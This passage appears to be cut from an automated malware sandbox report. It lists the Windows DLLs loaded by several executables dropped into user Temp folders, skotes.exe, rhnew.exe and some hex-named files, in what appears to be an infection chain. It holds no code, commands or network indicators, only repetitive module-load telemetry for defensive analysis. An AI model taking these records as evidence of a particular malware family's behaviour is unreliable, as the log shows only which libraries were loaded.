                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: msvcr100.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
